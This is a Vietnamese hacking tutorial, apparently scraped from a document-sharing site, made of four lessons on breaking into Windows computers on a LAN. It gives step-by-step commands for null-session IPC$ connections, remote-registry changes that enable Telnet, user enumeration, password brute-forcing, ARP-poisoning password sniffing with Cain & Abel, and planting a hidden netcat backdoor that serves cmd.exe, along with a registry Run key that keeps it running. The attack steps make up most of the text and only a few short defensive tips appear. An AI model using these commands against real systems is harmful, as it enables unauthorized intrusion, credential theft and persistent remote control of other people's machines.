Bài 1:
Hack computer trong LAN. Không có gì mới mẻ trong cách xâm nhập nhưng nhiều 
người sử dụng máy tính trong LAN vẫn mắc phải,
Bài này mình viết với mong muốn cho các bạn thấy rằng hacker có thể sử dụng 
mọi thứ để xâm nhập máy tính ngay cả những điều mình nghĩ là đơn giản nhất
Đích tấn công
Tên máy tính: victim
Địa chỉ IP: 192.168.1.3
Hệ điều hành: Windows Server 2003
              
                                            
                                
            
 
            
                 13 trang
13 trang | 
Chia sẻ: luyenbuizn | Lượt xem: 1578 | Lượt tải: 2 
              
            Nội dung tài liệu Hack computer trong lan (hva), để tải tài liệu về máy bạn click vào nút DOWNLOAD ở trên
HACK COMPUTER TRONG LAN (HVA) 
Bài 1: 
Hack computer trong LAN. Không có gì mới mẻ trong cách xâm nhập nhưng nhiều 
người sử dụng máy tính trong LAN vẫn mắc phải, 
Bài này mình viết với mong muốn cho các bạn thấy rằng hacker có thể sử dụng 
mọi thứ để xâm nhập máy tính ngay cả những điều mình nghĩ là đơn giản nhất 
Đích tấn công 
Tên máy tính: victim 
Địa chỉ IP: 192.168.1.3 
Hệ điều hành: Windows Server 2003 
Bước 1: Đầu tiên ta kết nối đến ipc$ sử dụng lệnh sau: 
Code: 
c:\net use \\victim\ipc$ /u:administrator 
Bước 2: Mở registry và kết nối thao tác Registry với máy tính victim bằng cách 
Code: 
Start-->Run gõ regedit [enter] 
Trong môi trường Registry Editor. Chọn Connect Network Registry 
Nhập tên máy tính cần thao tác Registry từ xa. Ở đây là victim 
Bước3: 
Sau khi kết nối thành công đến Registry của victim ta đến 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer 
Thay đổi giá trị NTLM =0 để disable NTLM 
Bước 4: 
Sử dụng MMC để khởi động Telnet từ máy victim 
Bước 5: Kết nối đến máy victim 
Code: 
c:\telnet victim 
Khi login vào được máy victim rồi thì việc tiếp theo phải làm gì khi có shell thì 
chắc mình khỏi phải nói tiếp . 
Mở dịch vụ Telnet chỉ làm một trong những cách mà hacker sử dụng để truy nhập 
vào máy victim. Trường hợp khác có thể mở Remote Desktop, ...etc 
Qua đây cho ta thấy rằng nên disable những dịch vụ không cần thiết và không để 
Administrator rỗng hoặc đặt mật khẩu Administrator quá đơn giản, ...etc 
Chỉ cần một sơ hở nhỏ đối với máy tính của mình thì máy tính của mình có thể bị 
xâm hại. 
Để rõ hơn các bạn có thể tại video demo HACK LAN 
Bài 2: 
Bài thứ 2 mình muốn trình bày với các bạn kỹ thuật Sniff Password sử dụng Cain 
& Abel. 
Cain & Abel là một trong những công cụ đứng trong top các công cụ về security. 
Các bạn có thể tại phiên bản mới nhất 
tại  
Hiện tại mình sử dụng phiên bản Cain & Abel v4.9.3 
Cain & Abel v4.9.3 released 
New features: 
- Added Windows Mail (Vista) Password Decoder for POP3, IMAP, NNTP, 
SMTP and LDAP accounts. 
- Added PTW WEP cracking attack. 
- Added Windows Vista support in Wireless Password Decoder. 
- Wireless Password Decoder now uses DLL injection under XP. 
Các tính năng của Cain thì khỏi phải nói , quá trời trời luôn, ở đây mình chỉ giới 
thiệu Sniff Password. Các bạn có thể tham khảo thêm những tính năng của nó 
trong tài liệu kèm theo chương trình. 
Bước 1: Sau khi install xong Cain và khởi động Cain thì ta cần phải cấu hình 
Network Adapter cho đúng. 
Trên menu của Cain chọn Configure --> lựa chọn Network Adapter phù hợp 
Click Start Sniffer 
Bước 2: Lựa chọn Tab Sniffer --> Scan MAC Addresses, ở đây sẽ ra danh sách các 
địa chỉ IP mà chương trình Scan được 
Bước 3: Tab bên dưới của Tab Sniffer lựa chọn phần APR. Tai khung APR ta có 
thể thêm địa chỉ IP mà cần sniff. Lựa chọn IP đích , IP nguồn 
Bước 4: Và click Start APR, và ngồi chờ password "về làng" 
Các bạn có thể xem video clip sau để biết rõ hơn 
Trong đoạn video clip mình sẽ sniff password gửi từ máy có IP: 192.168.1.7. 
Địa chỉ IP máy mình là 192.168.1.6 có sử dụng chương trình Cain đang chờ dzớt 
bất kỳ password nào mà máy 192.168.1.7 đệ trình ) 
Bài 3: 
Bài viết này với mục đích chia sẻ,học hỏi,trao đổi kiến thức! Nội dung của bài viết 
là hack vào PC sử dụng HĐH windows và các phương pháp phòng chống (trong 
phạm vi kiến thức của tui thôi nha). 
Bây giờ chúng ta cùng bắt đầu suy nghĩ những hướng phải đi. Khi bạn Online ( tức 
kết nối vào Internet) bạn sẽ được ISP gán cho một IP nào đó. Vậy Hacker có biết 
được IP của bạn không? Câu trả lời là có ( nếu Hacker giao tiếp với bạn,có nghĩa là 
máy của bạn và máy của hacker có sự kết nối, đồng nghĩa với việc trao đổi các 
packet,từ các packet có thể biết được địa chi IP nguồn) 
Khi biết IP của bạn liệu hacker có thể hack vào máy tính của bạn không? Câu trả 
lời là hoàn toàn có thể. 
Vậy hacker làm như thế nào để Hack? 
Hacking thông qua resource share: 
Hacker có thể dùng các tool hack tự động ví dụ như : ent3,legion… ( nhưng bản 
chất của các công cụ này là thưc hiện các bước mà tôi sẽ nói dưới đây 1 cách tự 
động,chính vì vậy việc dùng các tool này là một cách khá củ chuối …) 
Trước tiên Hacker sẽ kiểm tra nhưng tài nguyên được chia sẻ trên máy tính của 
bạn. 
Chỉ bằng vài dòng lệnh đơn giản trên comand line: 
CODE 
[C:\>Net view \\x.x.x.x ( với x.x.x.x là địa chỉ IP của bạn mà hacker đã biết ) 
Shared resources at \\x.x.x.x 
Share name Type Used as Comment 
------------------------------------------------------------------------------- 
C Disk 
PRJA3 Disk 
The command completed successfully. 
C:\> 
Với Windows 95 & 98 thì khả năng bị hack Cao hơn nhiều so với Windows 
NT,2000,XP ( vì win 95,98 dùng định dạng FAT&FAT32 có độ bảo mật thấp hơn 
nhiều so với NTFS) 
Đối với hai loại Windows này (95,98) Hacker thậm chí không cần lấy 
Administrator cũng có thể làm được tất cả ( bạn có tin không ?). 
Khuyến cáo : không nên dùng 2 loại win này vì quá lỗi thời và có thể bị hack bất 
cứ lúc nào. 
Sau khi liệt kê các Ổ đĩa,folder share bước tiếp theo của hacker là phải truy cập 
vào các ổ đĩa,folder đó để lấy dữ liệu (đây cũng là mục đích của hacker).Hacker sẽ 
ánh sạ ổ đĩa ,thư mục share để truy cập vào. 
Cũng bằng command line: 
CODE 
C:\> net use z: \\x.x.x.x \share 
The command completed successfully 
. 
Chẳng lẽ hack đơn gian vậy sao ? Không , không hề đơn giản như thế bởi vì máy 
của victim có đặt password ( viêc ánh sạ cần phải biết username & password ).Thế 
là Hacker pó tay ? không hacker không bao giờ chịu pó tay,hacker sẽ cố gắng lấy 
username & password 
Lấy Username : 
CODE 
C 
:\> Nbtstat –A x.x.x.x 
NetBIOS Remote Machine Name Table 
Name Type Status 
--------------------------------------------- 
ADMIN UNIQUE Registered 
BODY GROUP Registered 
ADMIN f UNIQUE Registered 
BODY GROUP Registered 
BODY UNIQUE Registered 
..__MSBROWSE__. GROUP Registered 
MAC Address = 00-08-A1-5B-E3-8C 
Vậy máy x.x.x.x sẽ có 2 username là : ADMIN va BODY 
Khi đã có username hacker sẽ tiến hành Crack password ( dựa vào các tool như : 
pqwak,xIntruder) Hoặc Hacker sẽ tiến hành tạo ra một từ điển ( dựa vào khả năng 
phán đoán của hacker ) tên là : pass.txt 
CODE 
“” ADMIN 
123456 ADMIN 
123456 BODY 
“” BODY 
… 
Sau đó hacker crack bang lệnh : 
[/CODE] 
Cũng có thể tạo Userlist.txt và passlist.txt rồi dùng lệnh: 
CODE 
C:\> FOR /F %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt 
x.x.x.x.%I>>output.txt 
Đối với Win 2000,XP hacker sẽ không là gì nếu không phải administrator chính vì 
vậy hacker bằng mọi giá sẽ lấy cho được administrator. 
nếu lấy được admin thì việc còn lại thì chờ hacker định đoạt. 
Khuyến cáo : không nên share gì hết ( trong trường hợp buộc phải share thì nên đặt 
password phức tạp 1 chút ) 
Giả sử rằng máy của Victim không share. Vậy hacker làm sao ? 
Trong trường hợp này hacker sẽ đoán user & pass (có thể dùng cách ở trên hoặc 
dung các tool như: user2sid/sid2user,dumpACL,SMBGrind……) sau đó kết nối tới 
IPC$ ( mặc định share của windows) 
CODE 
C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator” 
The command completed successfully. 
Trong trường hợp không thê đoán Đươc user & pass hacker có thể thiết lập một 
Null session tới máy victim: 
CODE 
C:\> net use \\x.x.x.x\IPC$ “” /user:”” 
The command completed successfully 
Và rồi nếu victim permission không đúng sẽ có nhưng hậu quả khôn lường. 
khuyến cáo : Vô hiệu hoá NetBios ( Bấm vào My Network Places chọn Local Area 
Connetion, chọn TCP/ IP sau đó bấm vào propperties chọn Advandce, chọn WINS 
và bấm vào Disable NetBIOS over TCP / IP), Dùng firewall chặn 1 số port không 
cần thiết , khoá tài khoản sau 1 số lần đăng nhập thất bại . 
Tiện đây cũng nói thêm về điều khiển từ xa ( vì có nhiều bạn đột nhập được vào rùi 
mà không biết phải làm sao ) 
Giả sử rằng bạn đã có username,password của admin của máy victim rồi: 
giờ thiết lập 1 phiên làm viêc: 
CODE 
C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator” 
The command completed successfully. 
Sau đó ta cần copy backdoor để điều khiển máy victim có rất nhiều loại backdoor 
nhưng tôi thấy hơn cả vẫn là : netcat ( nc) 
chép nc vào máy victim 
CODE 
C 
:\>copy nc.exe \\x.x.x.x\ADMIN$\nc.exe 
The command completed successfully. 
1 file copies 
Chạy service Schedule trên máy victim ( có service này mới thực thi đ ươc các file 
trên máy victim, mặc đinh khi cài win sẽ chạy service này) 
CODE 
C:\> sc \\x.x.x.x start schedule 
service_name : schedule 
Bây giờ kiểm tra giờ trên máy victim 
CODE 
C:\> net time \\x.x.x.x 
Current time at \\10.0.0.31 is 6/29/2005 4:50 AM 
The command completed successfully. 
Bây giờ chạy netcat ở chế độ ẩn lắng nghe cổng 111: 
CODE 
C:\>AT \\x.x.x.x 4:55 /interactive “c:\windows\nc.exe” –L –d –p111 –e cmd.exe 
Added a new job with job ID = 1 
đợi đến 4:55 rồi chạy thử nc.exe 
CODE 
C:\>nc –nvv x.x.x.x 111 
(UNKNOWN) [x.x.x.x] 111 (?) open 
Microsoft Windows XP [Version 5.1.2600] 
© Copyright 1985-2001 Microsoft Corp. 
C:\windows> 
Bây giờ làm gì thì tuỳ nha ( nhưng đừng có phá hoại người ta nhe’) 
Vấn đề là làm sao cho những lần sau victim bật máy tính lên netcat tự động chạy 
và lắng nghe mệnh lệnh của ta? 
Bạn có thể cho netcat khởi động cùng windows. "moi" file netcat.reg (dùng 
notepad và save lại thành .reg) có nội dung như sau: 
CODE 
Windows Registry Editor Version 5.00 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run] 
"netcat"="\"C:\\nc\\nc.exe\" -L -d -p111 -e cmd.exe" 
Sau đó copy sang máy victim và chạy nha! 
Hy vọng mọi người đừng phá hoại nha ! Thân 
Tác giả: ZENO-HVAOnline 
Bài 4: Phương pháp cơ bản để đột nhập trong Lan 
Link: 
phuong-phap-co-ban-de-dot-nhap-trong-lan.html 
(sưu tầm) 
1- Kiểm tra IPC share: IPC viết tắt của Inter-Process Communication, được dùng 
trong việc chia sẻ dữ liệu giữa các ứng dụng và máy tính trên mạng 
(NT/2K). Khi một máy được khởi động và log vào mạng, hdh sẽ tạo 1 chia sẻ 
ngầm định tên là IPC$. Nó sẽ giúp cho các máy khác có thể nhìn thấy và 
kết nối đến các chia sẻ trên máy này. Tuy nhiên, có thể vì một lý do gì đó, người 
dùng xóa mất IPC$ share, do đó, ta cần kiểm tra và tạo lại kết nối đến 
IPC$ (gọi là null connection), nếu kết nối thành công, ta có thể thấy được cả các 
chia xẻ đặc biệt được ẩn (bao gồm C$, ADMIN$, IPC $, IPC$). Cụ thể, 
dùng 1 trong 3 lệnh sau ở command prompt: 
C:\>NET USE \\TARGET\IPC$ "" /USER:"" 
C:\>NET USE \\TARGET\IPC$ * /USER: 
C:\>NET USE \\TARGET\IPC$ * /USER:"" 
trong đó: target là computername hoặc IP của máy bạn muốn kết nối. 
Lưu ý, các chia xẻ có dấu $ phía sau tên chỉ ra rằng chia xẻ đó được ẩn và cách này 
chỉ áp dụng khi cổng NetBios 139 của máy bạn và máy đích được mở. 
Thường là đối với chia xẻ dạng này, bạn sẽ ít có cơ hội khai thác được gì. Tuy 
nhiên, nếu may mắn, bạn vẫn có thể khai thác được trong trường hợp các chia xẻ 
đó không yêu cầu mật khẩu. 
Kế đến, bạn dùng lệnh sau để xem các chia xẻ thấy được: 
C:\>net view \\TARGET 
Lệnh net view sẽ liệt kê danh sách các share của máy đích. Bạn dùng net view /? 
để biết thêm các cách dùng khác. 
Sau khi tạo được null connection và biết được các share trên máy đối phương. Ðối 
với các share được bảo vệ bằng username/password, bạn có thể dùng các tool sau 
để thử crack chúng: Nat (NetBIOS Auditing Tool)... 
Ðể tiết kiệm thời gian, bạn tìm và dùng thử chương trình xSharez scanner, cũng có 
thể cho bạn kết quả tương tự. 
2- Kiểm tra các cổng mở 
Một cách khác để connect vào một máy là duyệt các port mở của máy đích. Tuỳ 
loại port mà ta có cách thức khai thác khác nhau, đơn giản nhất là dùng 
telnet để connect vào máy thông qua port được mở, ví dụ: 
C:\telnet Vietnam.info 
Một số port thông dụng: 
21: FTP 
23: Telnet proxy server 
25: SMTP 
110: POP3 
139: NETBIOS 
1080: SOCKS proxy 
6667: IRC mapping 
..... 
Các công cụ để scan port có rất nhiều, ví dụ như: superscan, elite, .... – Các bạn 
đọc có thể vào phần công cụ Learning hacking For Viet để tài về 
Sau khi scan được port nào đang opened, nếu port đó ngoài những port trên, bạn 
thử dùng telnet để connect, nếu thành công, bạn có thể vào command prompt shell 
của máy đó. 
3- Kiểm tra các lổ hổng của OS/Software 
Cách cuối cùng tớ nói ở đây, cũng là cách khó nhất là duyệt xem máy đó đang 
dùng OS gì, server gì, software nào. Mỗi loại trên có các hole/vulnerability riêng, 
được tìm thấy và mô tả chi tiết trong các site về security như ntbugtraq, 
securityfocus, hoặc trong forum. 
Từ những lổ hổng biết được, ta sử dụng các exploit tương ứng để thâm nhập vào 
máy. 
Lỗi sơ đẳng nhất trong các system software là lỗi về cách đặt password, ví dụ như 
các máy Wins 9x có thể vào mà không cần password (tất nhiên là khi đó, người log 
vào sẽ bị hạn chế truy cập các tài nguyên mạng); hoặc như với NT/2K, sau khi 
setup, password ngầm định của adminnistrator là rỗng, nếu user không thay đổi 
pass cho admin, thì ta có thể connect remote được dưới username là administrator 
mà không cần pass. 
Các lỗi còn lại thường là do các sai sót trong quá trình viết chương trình mà vô tình 
tạo nên những lỗ hổng, các đoạn code kiểm tra không đầy đủ, không stable...cho 
phép người dùng thực thi các lệnh, chạy các chương trình từ xa. Ví dụ như bug 
Unicode encoding của IIS4... Và cách thường dùng để nhập là tìm cách send 1 
trojant/backdoor (điển hình như Netcat...) đến máy đó, chạy backdoor đó để mở 1 
port nhất định nào đó, rồi ta sẽ connect remote vào port đó. 
            Các file đính kèm theo tài liệu này:
 hack_may_tinh_trong_mang_lan_.PDF hack_may_tinh_trong_mang_lan_.PDF